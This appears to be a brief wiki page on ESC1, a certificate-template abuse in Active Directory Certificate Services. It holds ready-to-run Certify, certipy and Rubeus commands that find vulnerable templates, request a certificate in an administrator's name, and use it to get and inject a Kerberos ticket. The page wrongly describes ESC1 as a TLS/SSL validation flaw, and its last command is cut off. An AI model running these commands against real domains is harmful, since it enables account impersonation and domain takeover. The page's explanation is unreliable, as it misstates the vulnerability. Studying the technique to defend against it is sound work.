ESC1 – Understand the Arbitrary Subject Alternative Name Vulnerability

ESC1 – Understand the Arbitrary Subject Alternative Name Vulnerability

The Arbitrary Subject Alternative Name (SAN) Vulnerability refers to a security flaw in certificate validation mechanisms of TLS/SSL protocols. This vulnerability allows attackers to issue certificates that include unauthorized domain names in the SAN field, potentially enabling phishing attacks or man-in-the-middle (MITM) attacks.

It stems from inadequate verification of the entities that request certificates and the domains listed in the SAN field.

To mitigate this vulnerability, it's essential to:

  • Implement strict validation processes for certificate requests, ensuring that the entity requesting the certificate has legitimate control over the domains listed in the SAN field.

  • Use Certificate Transparency logs to monitor and identify potentially malicious certificates.

  • Employ modern TLS libraries and configurations that adhere to best practices in certificate validation.

To find vulnerable certificate templates you can run:

Certify.exe find /vulnerable
certipy find -u [email protected] -p Passw0rd -dc-ip 172.16.126.128

To abuse this vulnerability to impersonate an administrator one could run:

Certify.exe request /ca:dc.theshire.local-DC-CA /template:VulnTemplate /altname:localadmin
certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC1' -alt '[email protected]'

Then you can transform the generated certificate to .pfx format and use it to authenticate using Rubeus or certipy again:

Rubeus.exe asktgt /user:localdomain /certificate:localadmin.pfx /password:password123! /ptt
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip 

Last updated